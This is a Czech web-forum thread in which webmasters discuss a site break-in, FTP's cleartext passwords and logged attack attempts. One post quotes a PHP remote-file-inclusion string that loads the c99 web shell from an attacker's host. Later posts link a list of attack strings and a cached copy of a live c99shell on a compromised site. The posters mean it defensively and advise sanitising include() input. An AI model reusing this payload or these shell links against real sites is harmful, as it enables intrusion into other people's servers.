Hacker

Někdo se mi dostal na stránky. Heslo jsem nikdy nikomu neřekl. Asi se tam dostává přes ftp, protože adresa posledního přihlášení je moje. Co s tím mohu udělat? Poraďte, prosim.
Zmen si heslo, nejlím když kombinuješ abecedu a čísla. a minimálně 7 znaků, pre ty hovadinovy hackerrský programy ti to budou louskat alespon 5 let a to nikoho nebude lákat... Taky trochu hackuju....
<HTML>Kentaur: Pokud taky trochu hackuješ, tak bys moh vědět, že heslo se dá získat i jinak a jistě i víš, že protokol FTP je nezabezpečený a heslo v něm putuje v otevřené podobě. Stačí tedy FTP komunikaci někde při cestě zachytávat, hacker může být například ve stejné LAN síti, ve které je oběť.</HTML>
Kentaur: to, ze nekomu koukas na prsty, kdyz pise heslo, to bych hackovanim fakt nenazyval...
Já jsem měl taky včera večer zajímavý přístup na mé stránky. Podle statistiky zadal k mé adrese někdo toto: ....n.php?page=http://devrimhack.de.funpic.de/yuklenenler/c99.txt?

Přístup byl z dsl85-107-23893.ttnet.net.tr . Tak jsem se podíval na ten soubor http://devrimhack.de.funpic.de/yuklenenler/c99.txt a na jeho zdrojový kód. Když jsem ho přejmenoval na .php, abych koukl co to je, antivir po něm ihned hrábnul a smazal ho!

Zajímavý je docela i adresář
http://devrimhack.de.funpic.de/yuklenenler/
a soubor
http://devrimhack.de.funpic.de/yuklenenler/SAO.HTM

Otázka pro zkušenější : O co se jedná v uvedeném souboru c99.txt?
je to hrozne dlouhy, ale popravde ani zacatek ve mne zrovna duveru nebudi...

kazdopadne je to varovani, aby si kazdy osetril pouziti include z $_GET parametru...
Jj. Lidi se snazi o vsechno. Jak rikal Donny, je dobre vzdy osetrit $_GET.
Kdo chce, tak prikladam dalsi retezce pokousejici se o utok na stranky.
http://tom.czweb.org/pokusy_o_utok.txt .
Je to seznam pokusu za posledni 2 roky na me stranky. Za retezci je uvedeno kolikrat byl retezec pouzit. Zaznamy muzou byt uz dost stare, takze nemusi fungovat. A rozhodne upozornuji predem, zkousejte pouze na vlastni riziko ;)
Podival jsem se na ten soubor. Teda jen ten zacatek. Ale uz na prvni pohled je tam videt, ze se jedna o skript pokousejici se nabourat do stranek, dokonce i do systemu. Umoznuje utocnikovi zjistit informace a obsah souboru a s temito soubory jakkoli manipulovat. Je tam videt i pokus o MySQL.
Proste takovy skriptik na napadeni pocitace.
>http://tom.czweb.org/pokusy_o_utok.txt

29: http://www.google.com/index.html 1

? :D
No co. Prehlidl jsem se ;D Ono je tech zaznamu vice. Krome platnych, tam jsou i preklepy, nebo zapomneli odstranit moji adresu z adresniho radku.
Koukal jsem do logu antiviru, proč soubor c99.txt po přejmenování na .php smazalo, a je tam u něj uvedeno backdoor trojan



----------------
Ale aspoň mě to donutilo preventivně změnit a zvětšit heslo do administrace stránek
Ten adresář je opravdu zajímavej, jinak je to opravdu jeden z pokusů spustit na vzdáleném počítači shell a pak se tam vyřádit....
Bohužel změna hesla to nevyřeší, jedině provozovat ošetřené php scripty...
Stačí zadat C99Shell do Googlu a jsme doma. Slouží na adminí analýzu webu, ale zároveň backdoor a trojan jako poleno:
http://66.249.93.104/search?q=cache:2LSzSqP1PTsJ:www.progressiveteam.com/catalog/ecart/images/c99shell.php%3Fact%3Df%26f%3Dlang-czech.php%26d%3D%252Fhome%252Fwww%252Fjapan-karting%252Fadmin%252Flanguage%26+c99shell.php&hl=cs&ct=clnk&cd=2&lr=lang_cs

A samozřejmě u SAFE MODE OFF je tím možno získat i zdrojáky (jako ostatně i bez tohoto skriptu jediným příkazem)...
Dobrej odkaz z Googlu, dobrý je jak tam jsou předdefinovaný příkazy (find) v políčku Select :-))